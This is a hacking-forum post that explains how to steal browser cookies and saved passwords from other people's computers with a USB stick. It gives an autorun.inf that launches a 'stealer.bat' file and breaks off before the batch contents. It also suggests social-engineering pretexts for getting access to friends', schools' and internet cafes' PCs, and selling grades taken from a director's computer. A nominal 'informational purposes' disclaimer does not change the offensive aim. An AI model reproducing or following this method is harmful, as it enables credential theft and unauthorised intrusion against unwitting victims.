• Always report not working content or content with broken links! We will delete them.

    Use the FILTER (keywords) or SEARCH to get your wanted content more easily.

Leaks Cookies-stealer from USB stick

Hacking Father 8

Hacking Father

381
Message
4,666
Likes

Owner
『FOUNDER』
This article is published for informational purposes only and does not call for action, our goal is to protect you from scammers. How you use it is your own business.



Today we got an interesting exploit for our review that explains how to style cookies from browsers, as well as view and extract passwords.

Cookies are encrypted text documents that store basic information about the user who uses the browser. This information includes browser usage statistics, personal settings, saved logins and passwords, and much more.

There is an opinion on the Internet that cookies are such small programs that can be infected with a virus and then they will automatically send information about the user to a thief. In fact, these are just small databases, a kind of text documents, inside which information about the user is stored in encrypted form. There is no point in infecting such files. But they can always be stolen :)

The point of stealing cookies is to obtain information about the victim. It is convenient when all grades in your school are stored in an electronic journal. You go into the director's office, put in a flash drive, and you can sell good grades on the report card to classmates. Also a kind of small illegal earnings.

Also, in some Internet cafes, you can collect a sea of personal data of past visitors (provided that they have not cleared the cookies after themselves). True, few people do this. Internet cafes are rarely visited by people who are good at PCs. Although, this is a more controversial statement. So, sir, something we digress from the topic.

What is needed to steal Cookie directly?​

Let's start with the caveats. This method has both certain disadvantages and some advantages. Let's start with the cons.

1. Incompatibility with WINDOWS 10, and the latest versions of the seven.

Do not think, the exploit itself works on all versions of the operating system. The problem is that it is on THESE OS versions that the stealer will have to be used manually. Microsoft removed the ability to run AutoRun on 10 and the latest versions of the 7 for security reasons, which complicates the task. However, nothing prevents us from weaving noodles on the ears of a friend that you need to run to him and drop the files you need at his house onto your USB flash drive yourself. Fortunately, the process lasts milliseconds, the victim will not even understand anything.

2. It makes sense to style cookies only when you are sure that the victim is saving passwords in the browser.

Otherwise, you will have little useful information to extract from the information received.

Now let's move on to the pluses.

1. The method is not fired by antivirus.

In fact, you are not downloading a Trojan to your computer or using any malware. During styling, all the information received is copied to a USB flash drive, where the HIDE attribute is assigned to it, and they become hidden.

2. The method refers to social engineering.

No matter who says anything, it is easier to hack a person than a computer. There can be a sea of prepositions. Ask a friend to come to him with a USB flash drive and download music, because your internet is supposedly turned off. At school - print your presentation. In an Internet cafe - no pretexts are needed at all.

And now that we have figured out the pros and cons, it's time to move on to the step-by-step analysis of the instructions.​


1. Create 2 text files on the USB stick. The first one is called “autorun.inf” and the second one is “stealer.bat” * .bat is the executable file extension. Those. it can be used as a program *

In the first, we write the following lines:

[AutoRun]

Open = "stealer.bat"


The first file is responsible for the autostart of the styler.

Program interface

Returning to the disadvantages described above, you should decide which method of stilling to use. If the victim has the latest version of Windows 7 or even a dozen, then it is best to do the stilling manually. That is, you need to come to the victim's home, naturally having come up with an excuse in advance, connect the USB flash drive to the PC, and start the batch file manually.
 
Last edited:
Top Bottom
AdBlock Detected

We get it, advertisements are annoying!

Sure, ad-blocking software does a great job at blocking ads, but it also blocks useful features of our website. For the best site experience please disable your AdBlocker.

I've Disabled AdBlock